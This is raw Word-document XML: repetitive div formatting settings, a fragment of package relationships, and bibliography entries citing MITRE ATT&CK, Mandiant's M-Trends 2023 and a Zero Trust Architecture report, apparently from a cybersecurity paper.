      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1418089894">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1427729191">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1439060592">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1470397406">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1479565553">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1516309962">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1521354289">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1539931843">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1556889801">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1571035179">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1582449119">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1597901505">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1617373973">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1622422069">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1628119641">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1659721907">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1661692612">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1672483568">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1685744338">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1713728679">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1717773090">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1727948688">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1729572873">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1740980218">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1751853561">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1768455783">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1772974136">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1787845793">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1796947886">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1824850591">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1826357772">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1834296198">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1842773812">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1843857379">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1848520052">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1870996442">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1893929628">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1927613335">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1943107103">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1943567132">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1949849351">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1967660911">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1968126467">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1988166258">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2067992040">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2070228705">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2078090208">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2083990082">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2098014321">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2106339881">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2106874886">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2118208694">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2129741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footer" Target="footer1.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.jpeg"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2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MIT25</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{1E11C87C-E6EE-48D4-B34F-8B8B05EAD9D8}</b:Guid>
    <b:Title>MITRE ATT&amp;CK®</b:Title>
    <b:ProductionCompany>MITRE</b:ProductionCompany>
    <b:YearAccessed>2025</b:YearAccessed>
    <b:MonthAccessed>11</b:MonthAccessed>
    <b:DayAccessed>20</b:DayAccessed>
    <b:URL>https://attack.mitre.org</b:URL>
    <b:Author>
      <b:Author>
        <b:Corporate>MITRE Engenuity</b:Corporate>
      </b:Author>
    </b:Author>
    <b:RefOrder>1</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Man23</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{CE4630F9-2D3B-4482-A907-08ED138D06C1}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Mandiant</b:Last>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Mandiant Threat Intelligence</b:Title>
    <b:ProductionCompany>M-Trends 2023: A Shift in the Cyber Threat Landscape</b:ProductionCompany>
    <b:Year>2023</b:Year>
    <b:Month>04</b:Month>
    <b:YearAccessed>2025</b:YearAccessed>
    <b:MonthAccessed>11</b:MonthAccessed>
    <b:DayAccessed>20</b:DayAccessed>
    <b:URL>https://www.mandiant.com/resources/m-trends-2023</b:URL>
    <b:RefOrder>2</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Sco20</b:Tag>
    <b:SourceType>Report</b:SourceType>
    <b:Guid>{0642C93E-74BD-47E0-86A3-6800BA5445FB}</b:Guid>
    <b:Title>Zero Trust Architecture</b:Title>
    <b:Year>August 2020</b:Year>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
